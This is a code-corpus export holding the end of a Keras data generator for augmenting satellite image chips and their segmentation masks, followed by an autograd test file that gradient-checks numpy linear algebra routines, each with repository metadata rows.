    and applies optional augmentation: random zoom (with reflect padding),
    random crop, x/y flips, 90-degree rotations, and HSV brightness scaling.
    Images are rescaled to [0, 1]; masks are returned as booleans.

    Parameters
    ----------
    image_arr : ndarray, shape (n_samples, height, width, channels).
    mask_arr : ndarray of masks with the same leading three dimensions.
    batch_size : int, samples per batch.
    crop : bool, take random (output_y, output_x) crops instead of resizing.
    output_x, output_y : int, output width and height.
    shuffle : bool, reshuffle sample order every epoch.
    flip_x, flip_y : bool, enable random flips along axes 0 and 1.
    zoom_range : float or None, fractional random zoom.
    rotate : bool, enable random 90-degree rotations.
    rescale_brightness : (low, high) or None, HSV value-channel scale range.
    output_dir : str, if non-empty each generated batch is saved as .npy.
    """

    def __init__(self, image_arr, mask_arr, batch_size=32, crop=False,
                 output_x=256, output_y=256, shuffle=True, flip_x=False,
                 zoom_range=None, flip_y=False, rotate=False,
                 rescale_brightness=None, output_dir=''):
        self.images = image_arr
        self.masks = mask_arr
        self.batch_size = batch_size
        self.initial_width = image_arr.shape[2]
        self.initial_height = image_arr.shape[1]
        self.output_x = output_x
        self.output_y = output_y
        self.crop = crop
        self.shuffle = shuffle
        self.flip_x = flip_x
        self.flip_y = flip_y
        self.rotate = rotate
        self.zoom_range = zoom_range
        self.output_dir = output_dir
        self.output_ctr = 0  # counter for saved batch files; never reset
        self.rescale_brightness = rescale_brightness
        self.on_epoch_end()  # draw the first epoch's augmentation params

    def on_epoch_end(self):
        'Update indices, rotations, etc. after each epoch'
        # reorder images
        self.image_indexes = np.arange(self.images.shape[0])
        if self.shuffle:
            np.random.shuffle(self.image_indexes)
        if self.crop:
            # random top-left crop corners, one per batch slot
            self.x_mins = np.random.randint(
                0, self.images.shape[2]-self.output_x, size=self.batch_size
            )
            self.y_mins = np.random.randint(
                0, self.images.shape[1] - self.output_y, size=self.batch_size
            )
        if self.flip_x:
            self.x_flips = np.random.choice(
                [False, True], size=self.batch_size
            )
        if self.flip_y:
            self.y_flips = np.random.choice(
                [False, True], size=self.batch_size
            )
        if self.rotate:
            # number of 90-degree rotations per batch slot
            self.n_rotations = np.random.choice(
                [0, 1, 2, 3], size=self.batch_size
            )
        if self.rescale_brightness is not None:
            self.amt_to_scale = np.random.uniform(
                low=self.rescale_brightness[0],
                high=self.rescale_brightness[1],
                size=self.batch_size
            )
        if self.zoom_range is not None:
            # clamp zoom_range so a fully zoomed-out image still covers the
            # requested output window
            if (1-self.zoom_range)*self.images.shape[1] < self.output_y:
                self.zoom_range = self.output_y/self.images.shape[1]
            if (1-self.zoom_range)*self.images.shape[2] < self.output_x:
                self.zoom_range = self.output_x/self.images.shape[2]
            self.zoom_amt_y = np.random.uniform(
                low=1-self.zoom_range,
                high=1+self.zoom_range,
                size=self.batch_size
            )
            self.zoom_amt_x = np.random.uniform(
                low=1-self.zoom_range,
                high=1+self.zoom_range,
                size=self.batch_size
            )

    def _data_generation(self, image_idxs):
        """Assemble one (X, y) batch for the given sample indices."""
        X = np.empty((self.batch_size, self.output_y, self.output_x,
                      self.images.shape[3]))
        y = np.empty((self.batch_size, self.output_y, self.output_x,
                      self.masks.shape[3]))
        for i in range(self.batch_size):
            curr_im = self.images[image_idxs[i], :, :, :]
            curr_mask = self.masks[image_idxs[i], :, :, :]
            if self.zoom_range is not None:
                # cv2.resize's dsize argument is (width, height)
                curr_im = cv2.resize(
                    curr_im,
                    (int(curr_im.shape[1]*self.zoom_amt_x[i]),
                     int(curr_im.shape[0]*self.zoom_amt_y[i])))
                curr_mask = cv2.resize(
                    curr_mask.astype('uint8'),
                    (int(curr_mask.shape[1]*self.zoom_amt_x[i]),
                     int(curr_mask.shape[0]*self.zoom_amt_y[i])))
                if len(curr_mask.shape) < 3:  # add third axis if absent
                    curr_mask = curr_mask[:, :, np.newaxis]
                curr_mask = curr_mask > 0
                # reflect-pad zoomed-out samples back toward croppable size
                pad_amt = [0, 0]
                if self.zoom_amt_y[i] < 1:
                    pad_amt[0] = int(self.images.shape[1]*self.zoom_amt_y[i]*0.5)
                if self.zoom_amt_x[i] < 1:
                    pad_amt[1] = int(self.images.shape[2]*self.zoom_amt_x[i]*0.5)
                if pad_amt != [0, 0]:
                    curr_mask = np.pad(
                        curr_mask,
                        pad_width=((pad_amt[0], pad_amt[0]),
                                   (pad_amt[1], pad_amt[1]),
                                   (0, 0)),
                        mode='reflect')
                    curr_im = np.pad(
                        curr_im,
                        pad_width=((pad_amt[0], pad_amt[0]),
                                   (pad_amt[1], pad_amt[1]),
                                   (0, 0)),
                        mode='reflect')
            if self.crop:
                curr_im = curr_im[self.y_mins[i]:self.y_mins[i]+self.output_y,
                                  self.x_mins[i]:self.x_mins[i]+self.output_x,
                                  :]
                curr_mask = curr_mask[
                    self.y_mins[i]:self.y_mins[i]+self.output_y,
                    self.x_mins[i]:self.x_mins[i]+self.output_x,
                    :]
            else:
                # BUG FIX: the original passed invalid 3-tuples to cv2.resize
                # (dsize must be (width, height)) and resized curr_im into
                # curr_mask, discarding the mask entirely.
                curr_im = cv2.resize(curr_im, (self.output_x, self.output_y))
                curr_mask = cv2.resize(curr_mask.astype('uint8'),
                                       (self.output_x, self.output_y))
                if len(curr_mask.shape) < 3:  # resize drops singleton channel
                    curr_mask = curr_mask[:, :, np.newaxis]
                curr_mask = curr_mask > 0
            if self.flip_x:
                if self.x_flips[i]:
                    curr_im = np.flip(curr_im, axis=0)
                    curr_mask = np.flip(curr_mask, axis=0)
            if self.flip_y:
                if self.y_flips[i]:
                    curr_im = np.flip(curr_im, axis=1)
                    curr_mask = np.flip(curr_mask, axis=1)
            if self.rotate:
                to_go = 0
                while to_go < self.n_rotations[i]:
                    curr_im = np.rot90(curr_im)
                    curr_mask = np.rot90(curr_mask)
                    to_go += 1
            if self.rescale_brightness is not None:
                # scale the HSV value channel, clipping to valid uint8 range
                hsv = cv2.cvtColor(curr_im, cv2.COLOR_BGR2HSV)
                v = hsv[:, :, 2]*self.amt_to_scale[i]
                v = np.clip(v, 0, 255).astype('uint8')
                hsv[:, :, 2] = v
                curr_im = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
            X[i, :, :, :] = curr_im
            y[i, :, :, :] = curr_mask
        X = X/255.
        return X, y

    def __len__(self):
        'Denotes the number of batches per epoch'
        # BUG FIX: samples live on axis 0 (see on_epoch_end's image_indexes);
        # the original divided the image height (shape[1]) by batch_size.
        return int(np.floor(self.images.shape[0]/self.batch_size))

    def __getitem__(self, index):
        'Generate one batch of data'
        # Generate indexes of the batch
        im_inds = self.image_indexes[index*self.batch_size:(index+1)*self.batch_size]
        # Generate data
        X, y = self._data_generation(image_idxs=im_inds)
        if self.output_dir:
            # Persist each batch; the counter only grows, so no overwrites.
            np.save(os.path.join(
                self.output_dir, 'images_{}.npy'.format(self.output_ctr)),
                X)
            np.save(os.path.join(
                self.output_dir, 'masks_{}.npy'.format(self.output_ctr)),
                y)
            self.output_ctr += 1
        return X, y
class FileDataGenerator(keras.utils.Sequence):
    """Data generator that reads matching image/mask GeoTIFF chips from disk.

    Images are read with cv2 (BGR); masks are read grayscale and binarized.
    Supports the same augmentations as the array-based generators: random
    zoom with reflect padding, random crop, flips, 90-degree rotations, and
    HSV brightness scaling. Images are rescaled to [0, 1].

    Parameters
    ----------
    image_paths : list of str, paths to image .tif files.
    mask_path : str, directory containing mask .tif files.
    image_shape : tuple (height, width, channels) shared by all images.
    traverse_subdirs : bool, kept for interface compatibility (unused here).
    chip_subset : list of str, chip ids used to filter images and masks.
    batch_size, crop, output_x, output_y, shuffle, flip_x, flip_y,
    zoom_range, rotate, rescale_brightness, output_dir : see
    FlatDataGenerator.
    """

    def __init__(self, image_paths, mask_path, image_shape,
                 traverse_subdirs=False, chip_subset=[], batch_size=32,
                 crop=False, output_x=256, output_y=256, shuffle=True,
                 flip_x=False, flip_y=False, zoom_range=None,
                 rotate=False, rescale_brightness=None, output_dir=''):
        self.traverse_subdirs = traverse_subdirs
        self.mask_path = mask_path
        # BUG FIX: join mask filenames to their directory unconditionally;
        # the original only joined inside the chip_subset branch, so without
        # a subset cv2.imread later got bare, cwd-relative filenames.
        self.mask_list = [os.path.join(mask_path, f)
                          for f in os.listdir(mask_path)
                          if f.endswith('.tif')]
        self.image_list = image_paths
        if chip_subset:
            # subset the raw mask and image lists based on a list of chips
            # provided as chip_subset
            self.image_list = [f for f in self.image_list if any(
                chip in f for chip in chip_subset
            )]
            self.mask_list = [f for f in self.mask_list if any(
                chip in f for chip in chip_subset
            )]
        self.image_shape = image_shape
        self.batch_size = batch_size
        self.n_batches = int(np.floor(len(self.image_list) /
                                      self.batch_size))
        self.output_x = output_x
        self.output_y = output_y
        self.crop = crop
        self.shuffle = shuffle
        self.flip_x = flip_x
        self.flip_y = flip_y
        self.rotate = rotate
        self.zoom_range = zoom_range
        self.output_dir = output_dir
        self.output_ctr = 0  # counter for saved batch files; never reset
        self.rescale_brightness = rescale_brightness
        self.on_epoch_end()  # draw the first epoch's augmentation params

    def on_epoch_end(self):
        'Update indices, rotations, etc. after each epoch'
        # reorder images
        self.image_indexes = np.arange(len(self.image_list))
        if self.shuffle:
            np.random.shuffle(self.image_indexes)
        if self.crop:
            # random top-left crop corners, one per batch slot
            self.x_mins = np.random.randint(
                0, self.image_shape[1]-self.output_x, size=self.batch_size
            )
            self.y_mins = np.random.randint(
                0, self.image_shape[0] - self.output_y, size=self.batch_size
            )
        if self.flip_x:
            self.x_flips = np.random.choice(
                [False, True], size=self.batch_size
            )
        if self.flip_y:
            self.y_flips = np.random.choice(
                [False, True], size=self.batch_size
            )
        if self.rotate:
            self.n_rotations = np.random.choice(
                [0, 1, 2, 3], size=self.batch_size
            )
        if self.rescale_brightness is not None:
            self.amt_to_scale = np.random.uniform(
                low=self.rescale_brightness[0],
                high=self.rescale_brightness[1],
                size=self.batch_size
            )
        if self.zoom_range is not None:
            # clamp zoom_range so a zoomed-out image still covers the window
            if (1-self.zoom_range)*self.image_shape[0] < self.output_y:
                self.zoom_range = self.output_y/self.image_shape[0]
            if (1-self.zoom_range)*self.image_shape[1] < self.output_x:
                self.zoom_range = self.output_x/self.image_shape[1]
            self.zoom_amt_y = np.random.uniform(
                low=1-self.zoom_range,
                high=1+self.zoom_range,
                size=self.batch_size
            )
            self.zoom_amt_x = np.random.uniform(
                low=1-self.zoom_range,
                high=1+self.zoom_range,
                size=self.batch_size
            )

    def _data_generation(self, image_idxs):
        """Read and augment one (X, y) batch for the given index list."""
        X = np.empty((self.batch_size, self.output_y, self.output_x,
                      self.image_shape[2]))
        # TODO: IMPLEMENT MULTI-CHANNEL MASK FUNCTIONALITY
        y = np.empty((self.batch_size, self.output_y, self.output_x, 1))
        for i in range(self.batch_size):
            im_path = self.image_list[image_idxs[i]]
            # TODO: IMPLEMENT BETTER REGEX-BASED CHIP ID SEARCHING
            # BUG FIX: str.rstrip strips a *character set*, not a suffix, so
            # rstrip('_image.tif') could eat trailing chip-id characters
            # (e.g. any trailing 'i'/'t'/'e'/...). Slice the suffix instead.
            if im_path.endswith('_image.tif'):
                base = im_path[:-len('_image.tif')]
            elif im_path.endswith('.tif'):
                base = im_path[:-len('.tif')]
            else:
                base = im_path
            chip_id = '_'.join(base.split('_')[-2:])
            matches = [f for f in self.mask_list if chip_id in f]
            if not matches:
                raise ValueError(
                    'No mask found for chip "{}"'.format(chip_id))
            mask_path = matches[0]
            im_arr = cv2.imread(im_path, cv2.IMREAD_COLOR)
            mask_arr = cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)
            mask_arr = mask_arr[:, :, np.newaxis] > 0
            if self.zoom_range is not None:
                # cv2.resize's dsize argument is (width, height)
                im_arr = cv2.resize(
                    im_arr,
                    (int(im_arr.shape[1]*self.zoom_amt_x[i]),
                     int(im_arr.shape[0]*self.zoom_amt_y[i])))
                mask_arr = cv2.resize(
                    mask_arr.astype('uint8'),
                    (int(mask_arr.shape[1]*self.zoom_amt_x[i]),
                     int(mask_arr.shape[0]*self.zoom_amt_y[i])))
                if len(mask_arr.shape) < 3:  # add third axis if absent
                    mask_arr = mask_arr[:, :, np.newaxis]
                mask_arr = mask_arr > 0
                # reflect-pad zoomed-out samples back toward croppable size
                pad_amt = [0, 0]
                if self.zoom_amt_y[i] < 1:
                    pad_amt[0] = int(self.image_shape[0] *
                                     self.zoom_amt_y[i]*0.5)
                if self.zoom_amt_x[i] < 1:
                    pad_amt[1] = int(self.image_shape[1] *
                                     self.zoom_amt_x[i]*0.5)
                if pad_amt != [0, 0]:
                    mask_arr = np.pad(
                        mask_arr,
                        pad_width=((pad_amt[0], pad_amt[0]),
                                   (pad_amt[1], pad_amt[1]),
                                   (0, 0)),
                        mode='reflect')
                    im_arr = np.pad(
                        im_arr,
                        pad_width=((pad_amt[0], pad_amt[0]),
                                   (pad_amt[1], pad_amt[1]),
                                   (0, 0)),
                        mode='reflect')
            if self.crop:
                im_arr = im_arr[self.y_mins[i]:self.y_mins[i]+self.output_y,
                                self.x_mins[i]:self.x_mins[i]+self.output_x,
                                :]
                mask_arr = mask_arr[
                    self.y_mins[i]:self.y_mins[i]+self.output_y,
                    self.x_mins[i]:self.x_mins[i]+self.output_x,
                    :]
            else:
                # BUG FIX: the original passed invalid 3-tuples to cv2.resize
                # and resized im_arr into mask_arr, discarding the mask.
                im_arr = cv2.resize(im_arr, (self.output_x, self.output_y))
                mask_arr = cv2.resize(mask_arr.astype('uint8'),
                                      (self.output_x, self.output_y))
                if len(mask_arr.shape) < 3:  # resize drops singleton channel
                    mask_arr = mask_arr[:, :, np.newaxis]
                mask_arr = mask_arr > 0
            if self.flip_x:
                if self.x_flips[i]:
                    im_arr = np.flip(im_arr, axis=0)
                    mask_arr = np.flip(mask_arr, axis=0)
            if self.flip_y:
                if self.y_flips[i]:
                    im_arr = np.flip(im_arr, axis=1)
                    mask_arr = np.flip(mask_arr, axis=1)
            if self.rotate:
                to_go = 0
                while to_go < self.n_rotations[i]:
                    im_arr = np.rot90(im_arr)
                    mask_arr = np.rot90(mask_arr)
                    to_go += 1
            if self.rescale_brightness is not None:
                # scale the HSV value channel, clipping to valid uint8 range
                hsv = cv2.cvtColor(im_arr, cv2.COLOR_BGR2HSV)
                v = hsv[:, :, 2]*self.amt_to_scale[i]
                v = np.clip(v, 0, 255).astype('uint8')
                hsv[:, :, 2] = v
                im_arr = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
            X[i, :, :, :] = im_arr
            y[i, :, :, :] = mask_arr
        X = X/255.
        return X, y

    def __len__(self):
        'Denotes the number of batches per epoch'
        return self.n_batches

    def __getitem__(self, index):
        'Generate one batch of data'
        # Generate indexes of the batch
        im_inds = self.image_indexes[index*self.batch_size:
                                     (index+1)*self.batch_size]
        # Generate data
        X, y = self._data_generation(image_idxs=im_inds)
        if self.output_dir:
            # Persist each batch; the counter only grows, so no overwrites.
            np.save(os.path.join(
                self.output_dir, 'images_{}.npy'.format(self.output_ctr)),
                X)
            np.save(os.path.join(
                self.output_dir, 'masks_{}.npy'.format(self.output_ctr)),
                y)
            self.output_ctr += 1
        return X, y
def get_files_recursively(image_path, traverse_subdirs=False):
    """Get files from subdirs of `path`, joining them to the dir.

    Returns the .tif files directly inside ``image_path`` when
    ``traverse_subdirs`` is False, otherwise every .tif anywhere under it.
    """
    if not traverse_subdirs:
        # flat listing: only entries directly inside image_path
        return [os.path.join(image_path, fname)
                for fname in os.listdir(image_path)
                if fname.endswith('.tif')]
    tif_paths = []
    for dirpath, _dirnames, filenames in os.walk(image_path):
        tif_paths.extend(os.path.join(dirpath, fname)
                         for fname in filenames
                         if fname.endswith('.tif'))
    return tif_paths
| 43.151943
| 88
| 0.500778
| 3,122
| 24,424
| 3.680333
| 0.059257
| 0.073107
| 0.053177
| 0.035509
| 0.878938
| 0.87215
| 0.855178
| 0.841688
| 0.824717
| 0.812707
| 0
| 0.021317
| 0.391132
| 24,424
| 565
| 89
| 43.228319
| 0.751328
| 0.045242
| 0
| 0.729885
| 0
| 0
| 0.022259
| 0
| 0
| 0
| 0
| 0.00177
| 0
| 1
| 0.030651
| false
| 0
| 0.007663
| 0
| 0.065134
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83fce9b590b279d89046da70539238fa2a1e26ad
| 11,108
|
py
|
Python
|
auto_gradient/tests/test_linalg.py
|
juliaprocess/ml_libs
|
52cac5d64b55a12dfbdad1c768cdd8d79d5789f5
|
[
"MIT"
] | 4
|
2021-01-12T22:02:57.000Z
|
2021-04-02T15:24:18.000Z
|
tests/test_linalg.py
|
RInterested/autograd
|
a2c8d44c686ceafb697c0a51efa374cd643d9d6b
|
[
"MIT"
] | null | null | null |
tests/test_linalg.py
|
RInterested/autograd
|
a2c8d44c686ceafb697c0a51efa374cd643d9d6b
|
[
"MIT"
] | 1
|
2017-07-30T23:49:27.000Z
|
2017-07-30T23:49:27.000Z
|
from __future__ import absolute_import
import itertools
import autograd.numpy as np
import autograd.numpy.random as npr
import autograd.scipy.linalg as spla
from autograd.util import *
from autograd import grad
from builtins import range
from functools import partial
npr.seed(1)
def check_symmetric_matrix_grads(fun, *args):
    """Gradient-check `fun` with its first argument symmetrized.

    Wraps `fun` so that its first argument is replaced by the symmetric
    matrix built from the lower triangle, (tril(A) + tril(A).T)/2, before
    evaluation, then delegates to check_grads on the wrapped function.
    """
    def symmetrize(A):
        L = np.tril(A)
        return (L + T(L))/2.
    new_fun = lambda *args: fun(symmetrize(args[0]), *args[1:])
    return check_grads(new_fun, *args)
T = lambda A : np.swapaxes(A, -1, -2)
def rand_psd(D):
    """Return a random D x D positive semi-definite matrix (A @ A.T)."""
    a = npr.randn(D, D)
    return np.dot(a, a.T)
def test_inv():
    # First- and second-order gradient checks for np.linalg.inv on a square
    # matrix shifted by the identity to keep it safely invertible.
    def fun(x): return to_scalar(np.linalg.inv(x))
    d_fun = lambda x : to_scalar(grad(fun)(x))
    D = 8
    mat = npr.randn(D, D)
    mat = np.dot(mat, mat) + 1.0 * np.eye(D)
    check_grads(fun, mat)
    check_grads(d_fun, mat)
def test_inv_3d():
fun = lambda x: to_scalar(np.linalg.inv(x))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 4
mat = npr.randn(D, D, D) + 5*np.eye(D)
check_grads(fun, mat)
check_grads(d_fun, mat)
mat = npr.randn(D, D, D, D) + 5*np.eye(D)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_solve_arg1():
D = 8
A = npr.randn(D, D) + 10.0 * np.eye(D)
B = npr.randn(D, D - 1)
def fun(a): return to_scalar(np.linalg.solve(a, B))
d_fun = lambda x : to_scalar(grad(fun)(x))
check_grads(fun, A)
check_grads(d_fun, A)
def test_solve_arg1_1d():
D = 8
A = npr.randn(D, D) + 10.0 * np.eye(D)
B = npr.randn(D)
def fun(a): return to_scalar(np.linalg.solve(a, B))
d_fun = lambda x : to_scalar(grad(fun)(x))
check_grads(fun, A)
check_grads(d_fun, A)
def test_solve_arg2():
D = 6
A = npr.randn(D, D) + 1.0 * np.eye(D)
B = npr.randn(D, D - 1)
def fun(b): return to_scalar(np.linalg.solve(A, b))
d_fun = lambda x : to_scalar(grad(fun)(x))
check_grads(fun, B)
check_grads(d_fun, B)
def test_solve_arg1_3d():
D = 4
A = npr.randn(D+1, D, D) + 5*np.eye(D)
B = npr.randn(D+1, D)
fun = lambda A: to_scalar(np.linalg.solve(A, B))
d_fun = lambda A: to_scalar(grad(fun)(A))
check_grads(fun, A)
check_grads(d_fun, A)
def test_solve_arg1_3d_3d():
D = 4
A = npr.randn(D+1, D, D) + 5*np.eye(D)
B = npr.randn(D+1, D, D+2)
fun = lambda A: to_scalar(np.linalg.solve(A, B))
d_fun = lambda A: to_scalar(grad(fun)(A))
check_grads(fun, A)
check_grads(d_fun, A)
def test_det():
def fun(x): return np.linalg.det(x)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_det_3d():
fun = lambda x: to_scalar(np.linalg.det(x))
d_fun = lambda x: to_scalar(grad(fun)(x))
D = 3
mat = npr.randn(D, D, D)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_slogdet():
    # Gradient of the log|det| output of slogdet; the sign output is ignored.
    def fun(x):
        sign, logdet = np.linalg.slogdet(x)
        return logdet
    d_fun = lambda x : to_scalar(grad(fun)(x))
    D = 6
    mat = npr.randn(D, D)
    # Checked on both mat and -mat so both determinant signs are exercised.
    check_grads(fun, mat)
    check_grads(fun, -mat)
    check_grads(d_fun, mat)
def test_slogdet_3d():
fun = lambda x: np.sum(np.linalg.slogdet(x)[1])
d_fun = lambda x: to_scalar(grad(fun)(x))
mat = np.concatenate([(rand_psd(5) + 5*np.eye(5))[None,...] for _ in range(3)])
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_vector_2norm():
def fun(x): return to_scalar(np.linalg.norm(x))
d_fun = lambda x: to_scalar(grad(fun)(x))
D = 6
vec = npr.randn(D)
check_grads(fun, vec)
check_grads(d_fun, vec)
def test_frobenius_norm():
def fun(x): return to_scalar(np.linalg.norm(x))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D-1)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_frobenius_norm_axis():
def fun(x): return to_scalar(np.linalg.norm(x, axis=(0, 1)))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D-1, D-2)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_vector_norm_ord():
    # nose-style generator test: yields one vector p-norm gradient check per
    # ord in 2..4.
    def helper(size, ord):
        def fun(x): return np.linalg.norm(x, ord=ord)
        vec = npr.randn(size)
        check_grads(fun, vec)
    for ord in range(2,5):
        yield helper, 6, ord
def test_norm_axis():
def helper(shape, axis):
def fun(x): return to_scalar(np.linalg.norm(x, axis=axis))
arr = npr.randn(*shape)
check_grads(fun, arr)
for axis in range(3):
yield helper, (6,5,4), axis
def test_norm_nuclear():
def fun(x): return to_scalar(np.linalg.norm(x, ord='nuc'))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D-1)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_norm_nuclear_axis():
def fun(x): return to_scalar(np.linalg.norm(x, ord='nuc', axis=(0, 1)))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D-1, D-2)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_eigvalh_lower():
def fun(x):
w, v = np.linalg.eigh(x)
return to_scalar(w) + to_scalar(v)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D)
hmat = np.dot(mat.T, mat)
check_symmetric_matrix_grads(fun, hmat)
check_symmetric_matrix_grads(d_fun, hmat)
def test_eigvalh_upper():
def fun(x):
w, v = np.linalg.eigh(x, 'U')
return to_scalar(w) + to_scalar(v)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D)
hmat = np.dot(mat.T, mat)
check_symmetric_matrix_grads(fun, hmat)
check_symmetric_matrix_grads(d_fun, hmat)
broadcast_dot_transpose = partial(np.einsum, '...ij,...kj->...ik')
def test_eigvalh_lower_broadcasting():
def fun(x):
w, v = np.linalg.eigh(x)
return to_scalar(w) + to_scalar(v)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(2, 3, D, D) + 10 * np.eye(D)[None,None,...]
hmat = broadcast_dot_transpose(mat, mat)
check_symmetric_matrix_grads(fun, hmat)
check_symmetric_matrix_grads(d_fun, hmat)
def test_eigvalh_upper_broadcasting():
def fun(x):
w, v = np.linalg.eigh(x, 'U')
return to_scalar(w) + to_scalar(v)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(2, 3, D, D) + 10 * np.eye(D)[None,None,...]
hmat = broadcast_dot_transpose(mat, mat)
check_symmetric_matrix_grads(fun, hmat)
check_symmetric_matrix_grads(d_fun, hmat)
def test_cholesky():
fun = lambda A: to_scalar(np.linalg.cholesky(A))
fun2 = lambda A: to_scalar(grad(fun)(A))
check_symmetric_matrix_grads(fun, rand_psd(6))
check_symmetric_matrix_grads(fun2, rand_psd(6))
def test_cholesky_broadcast():
fun = lambda A: to_scalar(np.linalg.cholesky(A))
fun2 = lambda A: to_scalar(grad(fun)(A))
A = np.concatenate([rand_psd(6)[None, :, :] for i in range(3)], axis=0)
check_symmetric_matrix_grads(fun, A)
check_symmetric_matrix_grads(fun2, A)
def test_cholesky_reparameterization_trick():
    # Differentiates through chol(A) @ eps with fixed noise (seeded RNG) —
    # the reparameterization trick used when sampling from a Gaussian.
    def fun(A):
        rng = np.random.RandomState(0)
        z = np.dot(np.linalg.cholesky(A), rng.randn(A.shape[0]))
        return np.linalg.norm(z)
    check_symmetric_matrix_grads(fun, rand_psd(6))
def test_sqrtm():
def fun(A):
return to_scalar(spla.sqrtm(A))
check_symmetric_matrix_grads(fun, rand_psd(6))
def test_solve_triangular_arg1():
D = 6
b = npr.randn(D)
trans_options = ['T', 'N', 'C', 0, 1, 2]
lower_options = [True, False]
for trans, lower in itertools.product(trans_options, lower_options):
def fun(A):
return to_scalar(spla.solve_triangular(A, b, trans=trans, lower=lower))
yield check_grads, fun, npr.randn(D, D) + 10*np.eye(D)
def test_solve_triangular_arg2_1d():
D = 6
A = npr.randn(D, D) + 10*np.eye(D)
trans_options = ['T', 'N', 'C', 0, 1, 2]
lower_options = [True, False]
for trans, lower in itertools.product(trans_options, lower_options):
def fun(b):
return to_scalar(spla.solve_triangular(A, b, trans=trans, lower=lower))
yield check_grads, fun, npr.randn(D)
def test_solve_triangular_arg2_2d():
D = 6
A = npr.randn(D, D) + 10*np.eye(D)
trans_options = ['T', 'N', 'C', 0, 1, 2]
lower_options = [True, False]
for trans, lower in itertools.product(trans_options, lower_options):
def fun(B):
return to_scalar(spla.solve_triangular(A, B, trans=trans, lower=lower))
yield check_grads, fun, npr.randn(D, D-1)
def test_svd_wide_2d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
m = 3
n = 5
mat = npr.randn(m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_wide_3d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
k = 4
m = 3
n = 5
mat = npr.randn(k, m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_square_2d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
m = 4
n = 4
mat = npr.randn(m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_square_3d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
k = 3
m = 4
n = 4
mat = npr.randn(k, m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_tall_2d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
m = 5
n = 3
mat = npr.randn(m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_tall_3d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
k = 4
m = 5
n = 3
mat = npr.randn(k, m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_only_s_2d():
def fun(x):
s = np.linalg.svd(x, full_matrices=False, compute_uv=False)
return to_scalar(s)
def d_fun(x):
return to_scalar(grad(fun)(x))
m = 5
n = 3
mat = npr.randn(m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_only_s_3d():
def fun(x):
s = np.linalg.svd(x, full_matrices=False, compute_uv=False)
return to_scalar(s)
def d_fun(x):
return to_scalar(grad(fun)(x))
k = 4
m = 5
n = 3
mat = npr.randn(k, m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
| 28.409207
| 83
| 0.614152
| 1,952
| 11,108
| 3.301742
| 0.067623
| 0.096819
| 0.073856
| 0.069822
| 0.813189
| 0.788984
| 0.764779
| 0.756711
| 0.748487
| 0.742746
| 0
| 0.018156
| 0.236406
| 11,108
| 390
| 84
| 28.482051
| 0.741688
| 0
| 0
| 0.674556
| 0
| 0
| 0.003151
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.236686
| false
| 0
| 0.026627
| 0.071006
| 0.349112
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8601661d78512c24f8fb94c9f762a53e82945b70
| 46,100
|
py
|
Python
|
docs/Data/models_new_fk.py
|
Ecotrust/TEKDB
|
c92500aa9c8271398721bf069b93d63d11510529
|
[
"MIT"
] | 4
|
2017-12-26T05:43:52.000Z
|
